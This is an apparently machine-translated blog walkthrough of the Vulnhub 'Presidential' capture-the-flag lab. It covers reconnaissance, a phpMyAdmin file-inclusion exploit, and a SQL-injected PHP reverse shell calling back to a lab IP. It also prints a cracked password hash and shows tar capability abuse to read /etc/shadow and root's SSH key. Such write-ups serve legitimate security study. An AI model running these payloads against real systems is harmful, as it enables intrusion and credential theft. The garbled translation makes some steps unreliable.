当前位置:网站首页>Vulnhub's presidential
Vulnhub's presidential
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 Service version discovery
5、 ... and 、 Directory scanning
6、 ... and 、 Subdomain explosion
Nine 、john Of hash It's worth blasting
11、 ... and 、tars Raise the right
One 、nmap The host found
Make one based on ping Scan , Others are a little slow
Two 、 Port scanning
3、 ... and 、 Service version discovery
Four 、 information gathering
1. Home page
As for other functions , Source code division , It doesn't have much effect on us .
5、 ... and 、 Directory scanning
Check one by one , No response , The domain name is collected above , Bind domain name , Trying to .
1. Bind domain name
2./config.php.bak
This one has 107B The data of . Under the source code, we found the name of the database , Account and password
6、 ... and 、 Subdomain explosion
Burst out one database.votenow.local, binding ip, After the visit .
Find a phpmyadmin The login interface of , Combined with the account and password we found earlier , Sign in phpmyadmin.
7、 ... and 、phpmyadmin
1. View version
、
2. Vulnerability search
There are three loopholes , Let's use 44928.txt The file contains a vulnerability .
3. The contents of the document
First use the database to write files , Then let's use the file to contain the execution file
4. Try
Be careful : take sessions Change it to session, Otherwise it won't work
Write the domain name in front , Followed by session Just ok 了
8、 ... and 、 rebound shell
Log out and log in again to get a new session, The remaining steps are similar to the above
select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'
Nine 、john Of hash It's worth blasting
stay phpmyadmin We also found a user name and hash value
admin $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
Try blasting
john hash --wordlist=rockyou.txt
Stella
su admin
and python Go back shell
Ten 、capability
1. View with capability Authority
getcap -r / 2>/dev/null
2. Means :
Permitted
This set defines the upper limit of privileges that a thread can have , yes Inheritable
and Effective
Superset of sets
Effective
When the kernel checks for privileged operations , Set of actual inspections ( You can add / Delete Effective
Medium capabilities
, To achieve temporary opening / Function of permission )
3. Check one by one
Find us admin Commands that users can execute .tars We can execute .
11、 ... and 、tars Raise the right
1. Read /etc/shadow
Read compression
tar -cf archive.tar /etc/shadow
decompression
tar -xf archive.tar
Use the inside root Of hash value , Find a dictionary to touch . Finding the right dictionary should be able to crack it
2. Read the private key file
Same as above tarS To read the file , Then decompress . Put it in admin Of .ssh below , And then through ssh Sign in , Mention right to success
ssh -i id_rsa [email protected] -p 2082
Get flag
边栏推荐
- vulnhub之presidential
- Numpy np.max和np.maximum实现relu函数
- Stm32hal library upgrades firmware based on flash analog U disk (detailed explanation)
- Qt+VTK+OCCT读取IGES/STEP模型
- After using the thread pool for so long, do you really know how to reasonably configure the number of threads?
- DS90UB949
- R语言ggplot2可视化:gganimate包创建动态折线图动画(gif)、使用transition_reveal函数在动画中沿给定维度逐步显示数据、在折线移动方向添加数据点
- AOSP ~ NTP ( 网络时间协议 )
- Multi dimensional monitoring: the data base of intelligent monitoring
- vulnhub之Ripper
猜你喜欢
2022 northeast four provinces match VP record / supplementary questions
FL Studio 20无限试用版水果编曲下载
金额计算用 BigDecimal 就万无一失了?看看这五个坑吧~~
Viewing binary bin files with notepad++ editor
基于turtlebot3实现SLAM建图及自主导航仿真
2022 东北四省赛 VP记录/补题
vulnhub之Ripper
Understand go language context in one article
ArcGIS应用(二十一)Arcmap删除图层指定要素的方法
The tutor put forward 20 pieces of advice to help graduate students successfully complete their studies: first, don't plan to take a vacation
随机推荐
vulnhub之GeminiInc
AOSP ~ NTP ( 网络时间协议 )
Kibana - installation and configuration of kibana
(database authorization - redis) summary of unauthorized access vulnerabilities in redis
金额计算用 BigDecimal 就万无一失了?看看这五个坑吧~~
鸿蒙第三次培训(项目实训)
Viewing binary bin files with notepad++ editor
Nestjs configuration service, configuring cookies and sessions
Use typora to draw flow chart, sequence diagram, sequence diagram, Gantt chart, etc. for detailed explanation
R language uses the aggregate function to calculate the mean value (sum) of dataframe data grouping aggregation without setting na The result of RM calculation. If the group contains the missing value
phpcms 提示信息頁面跳轉showmessage
libvirt 中体验容器
R language uses grid of gridextra package The array function combines multiple visual images of the ggplot2 package horizontally, and the ncol parameter defines the number of columns of the combined g
抓包整理外篇fiddler———— 会话栏与过滤器[二]
剑指offer专项32-96题做题笔记
银泰百货点燃城市“夜经济”
ASP. Net hotel management system
FL Studio 20 unlimited trial fruit arranger Download
uniapp实现点击加载更多
After setting up ADG, instance 2 cannot start ora-29760: instance_ number parameter not specified